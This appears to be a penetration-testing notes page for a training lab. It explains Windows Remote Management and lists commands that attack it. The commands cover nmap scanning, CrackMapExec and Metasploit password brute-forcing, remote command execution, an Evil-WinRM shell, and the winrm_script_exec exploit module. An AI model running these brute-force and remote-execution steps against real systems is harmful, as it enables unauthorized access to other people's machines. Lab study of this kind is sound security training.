WinRM

WinRM is a Windows protocol that enables remote management and access to Windows systems over HTTP or HTTPS. It is not enabled by default and must be explicitly configured. System administrators use WinRM to facilitate tasks such as:

  1. Remotely accessing and interacting with Windows hosts.

  2. Executing commands remotely on Windows systems.

  3. Managing and configuring Windows systems remotely.

WinRM commonly uses TCP ports 5985 (HTTP) and 5986 (HTTPS).

WSMan (Web Services for Management) is a protocol developed by Microsoft that allows for remote management of systems using web services. It is based on the Simple Object Access Protocol (SOAP) and is designed to standardize the way systems communicate with management tools. WSMan is often used in conjunction with WinRM for managing Windows environments.

Exploiting WinRM

WinRM enforces access control and security during communication between systems using various authentication methods. To test WinRM security, tools like CrackMapExec can be used to perform brute-force attacks, helping identify user credentials and execute commands on target systems. Additionally, the Evil-WinRM Ruby script provides a way to establish a command shell session on the target system, facilitating remote access and command execution.

Enumeration & Brute-force

nmap -sV -p- [IP]
nmap -sV --top-ports 7000 [IP]

# crackmapexec usage 
crackmapexec
# crackmapexec bruteforce 
crackmapexec winrm [IP] -u administrator -p /directory-to-wordlist 
crackmapexex winrm [IP] -u administrator -p password -x 'whoami'

Getting a Reverse Shell

evilwinrm.rb -u username -p 'password' -i [IP]
or
evil-winrm -u username -p password -i [IP]

w/ Metasploit

# Brute-force
msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set PASSWORD anything
exploit

# We are setting the PASSWORD because in the recent version of the "winrm_login" module, the PASSWORD option is required unless using Kerberos authentication. Metasploit will still use the USERPASS_FILE file.

# Supported authentication method
use auxiliary/scanner/winrm/winrm_auth_methods
set RHOSTS demo.ine.local
exploit

# Execute Command
use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit

# Exploitation
msfconsole -q
search winrm_script
use exploit/windows/winrm/winrm_script_exec
show options
set RHOST [IP]
set FORCE_VBS true
set USERNAME
set PASSWORD

Last updated